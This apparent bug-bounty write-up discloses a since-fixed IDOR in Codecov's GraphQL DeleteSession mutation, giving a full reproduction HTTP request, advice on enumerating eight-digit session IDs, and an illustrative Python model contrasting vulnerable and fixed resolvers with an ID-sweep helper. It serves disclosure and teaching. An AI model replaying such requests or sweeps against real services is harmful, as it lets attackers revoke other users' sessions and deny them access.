Hi Everyone, I’m thrilled to share another intriguing vulnerability I uncovered, this time in Codecov’s session management system. The vulnerability, an Insecure Direct Object Reference (IDOR), allowed an attacker to delete the sessions of other users, resulting in unauthorized session revocation. For this discovery, I was awarded a bounty of $850.
Understanding the Target: Codecov
Codecov is a popular code coverage tool that integrates with various continuous integration (CI) services, helping developers and organizations ensure code quality. It provides detailed coverage reports and facilitates the detection of code issues. However, a critical flaw in its session management system allows unauthorized users to terminate sessions of other users, disrupting their access to the platform.
The Vulnerability: Unauthorized Session Revocation
In Codecov, sessions are managed through GraphQL endpoints, allowing users to maintain continuous access to their accounts. I discovered that by changing the sessionid value in the DeleteSession mutation, an attacker could revoke the session of any user. This is a textbook Insecure Direct Object Reference (IDOR): the object reference supplied by the client is trusted without checking that the caller is allowed to act on it.
Understanding the Bug Type: Insecure Direct Object Reference (IDOR)
This vulnerability falls under Insecure Direct Object Reference (IDOR). IDOR occurs when an application exposes a reference to an internal object, such as a file or database key, and acts on that reference without verifying that the requesting user is authorized to access the object. In this case, Codecov’s GraphQL endpoint accepted the session ID supplied by the client and deleted that session, leading to unauthorized session termination.
Steps to Reproduce
1. Ensure you are logged in to the Codecov platform with a user account.
2. Send the following HTTP POST request to the GraphQL endpoint (/graphql/gh) with the necessary parameters to delete a session:

POST /graphql/gh HTTP/2
Host: api.codecov.io
Cookie: csrftoken=AEtIUAZfqtvzw8xQyIe4JWXdRUBqTIXq; sessionid=aqcpl41eemtojsxc5mvj3zona3gpkiuu; ajs_anonymous_id=c2c9aba0-4b31-425b-bba2-de417627ff54; _marketing_tags="utm_department=marketing&utm_source=direct"; session_expiry=2024-04-29T15:37:57.059539Z; _gcl_au=1.1.829559452.1713411868.314166038.1714398110.1714398109
Content-Length: 241
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Baggage: sentry-environment=production,sentry-public_key=63d24de2afa542ca8779d1ee5d395abc,sentry-trace_id=61bce3ab562546bb867b761e93f14c3f,sentry-sample_rate=0.2,sentry-sampled=true
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json; charset=utf-8
Accept: application/json
Token-Type: github-token
Sentry-Trace: 56d90707f39a4f569d78148fd442ffa5-b9b5169d5e118dea-1
Sec-Ch-Ua-Platform: "Linux"
Origin: https://app.codecov.io
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://app.codecov.io/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
{"query":"\n mutation DeleteSession($input: DeleteSessionInput!) {\n deleteSession(input: $input) {\n error {\n __typename\n }\n }\n }\n ","variables":{"input":{"sessionid": TARGET_SESSION_ID}}}
Substitute TARGET_SESSION_ID with the session ID of the target user (note that sessionid is a bare integer in the JSON above). The session IDs used by Codecov are relatively short, comprising only eight digits, so the space of possible values is small enough to iterate through. Combined with a response that tells a valid ID apart from an invalid one, this lets an attacker systematically enumerate and revoke sessions without knowing any ID in advance.
3. Submit the request to delete the target user’s session. A response indicating success means the session has been revoked.
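To make the flaw and its fix concrete, here is an added example that is not Codecov’s code and uses none of their framework: a minimal in-memory model of a deleteSession resolver, first in the vulnerable shape described above (the client-supplied sessionid is used directly as the lookup key and the only gate is that someone is logged in), then scoped to the caller’s own sessions. The store, user names and session IDs are constructed for the example, and the sweep helper shows why an endpoint whose responses distinguish valid IDs from invalid ones doubles as an enumeration oracle over the small eight-digit ID space.

```python
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, List, Optional

# Added example, not Codecov's code. It models only the authorization
# decision inside a deleteSession resolver; the store, user names and
# session ids below are constructed for the demonstration.


@dataclass
class Session:
    sessionid: int  # short numeric id, like the eight-digit ids in the write-up
    owner: str      # user the session belongs to


class SessionStore:
    """Stand-in for the sessions table. Ids are passed in explicitly so the
    example is deterministic; a real server would generate them."""

    def __init__(self) -> None:
        self._rows: Dict[int, Session] = {}

    def add(self, sessionid: int, owner: str) -> None:
        self._rows[sessionid] = Session(sessionid, owner)

    def get(self, sessionid: int) -> Optional[Session]:
        return self._rows.get(sessionid)

    def delete(self, sessionid: int) -> None:
        del self._rows[sessionid]

    def count_for(self, owner: str) -> int:
        return sum(1 for s in self._rows.values() if s.owner == owner)


Resolver = Callable[[SessionStore, Optional[str], int], dict]


def delete_session_vulnerable(store: SessionStore, current_user: Optional[str], sessionid: int) -> dict:
    """IDOR shape: the only check is that someone is logged in. The sessionid
    from the mutation input is used directly as the row key, so the caller can
    delete any user's session."""
    if current_user is None:
        return {"error": "unauthenticated"}
    if store.get(sessionid) is None:
        return {"error": "not found"}
    store.delete(sessionid)
    return {"error": None}


def delete_session_fixed(store: SessionStore, current_user: Optional[str], sessionid: int) -> dict:
    """Hardened shape: the lookup is scoped to the caller's own sessions, and
    'belongs to someone else' and 'does not exist' get the same answer so the
    endpoint cannot be used as an oracle for valid ids."""
    if current_user is None:
        return {"error": "unauthenticated"}
    row = store.get(sessionid)
    if row is None or row.owner != current_user:
        return {"error": "not found"}
    store.delete(sessionid)
    return {"error": None}


def seeded_store() -> SessionStore:
    """Constructed data: one victim session and one attacker session."""
    store = SessionStore()
    store.add(12345678, "victim")
    store.add(87654321, "attacker")
    return store


def attacker_revokes_victim(resolver: Resolver) -> dict:
    """The reproduction from the write-up: the attacker submits the victim's id."""
    store = seeded_store()
    response = resolver(store, "attacker", 12345678)
    return {"response": response, "victim_sessions_left": store.count_for("victim")}


def sweep(resolver: Resolver, candidates: Iterable[int]) -> List[int]:
    """Enumeration attempt over a slice of the id space: submit each candidate
    as the attacker and keep the ids the resolver accepted. Against the
    vulnerable resolver this both discovers and revokes other users' sessions."""
    store = seeded_store()
    return [sid for sid in candidates if resolver(store, "attacker", sid)["error"] is None]


if __name__ == "__main__":
    print("vulnerable:", attacker_revokes_victim(delete_session_vulnerable))
    print("fixed:     ", attacker_revokes_victim(delete_session_fixed))
    print("sweep vs vulnerable:", sweep(delete_session_vulnerable, range(12345670, 12345690)))
    print("sweep vs fixed:     ", sweep(delete_session_fixed, range(12345670, 12345690)))
```

In an ORM-backed resolver the same fix is usually a single change to the query: filter the delete by both the session ID and the authenticated user rather than looking the row up by ID alone, and return the same "not found" response whether the row is missing or belongs to someone else. The sweep helper also shows why the fixed version alone is not the whole story: even with ownership enforced, rate limiting on the mutation is what stops an attacker from cheaply probing the eight-digit space.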
Impact

This vulnerability poses a significant security risk to Codecov users: it lets an attacker revoke the sessions of legitimate users, undermining the availability of their accounts and the integrity of Codecov’s session state. No user data is disclosed, so confidentiality is not directly affected. The primary impacts include:
- Unauthorized Session Termination: Attackers can disrupt user access by revoking their sessions without proper authorization.
- Loss of User Control: Legitimate users lose control over their sessions.
- Denial of Service: The ability to terminate sessions can be used to deny users access to their accounts, impacting their ability to work effectively.

Response and Resolution
Upon discovering this vulnerability, I promptly reported it to the Codecov security team. The issue was reviewed, and I was awarded a bounty of $850 for identifying and reporting the flaw. Codecov has implemented a fix to ensure that session revocation actions are properly authorized and restricted.
Support and Follow
If you found this write-up insightful, please leave a clap and share your feedback in the comments. Follow me for more exciting findings and cybersecurity tips!
Find me on Twitter: @a13h1_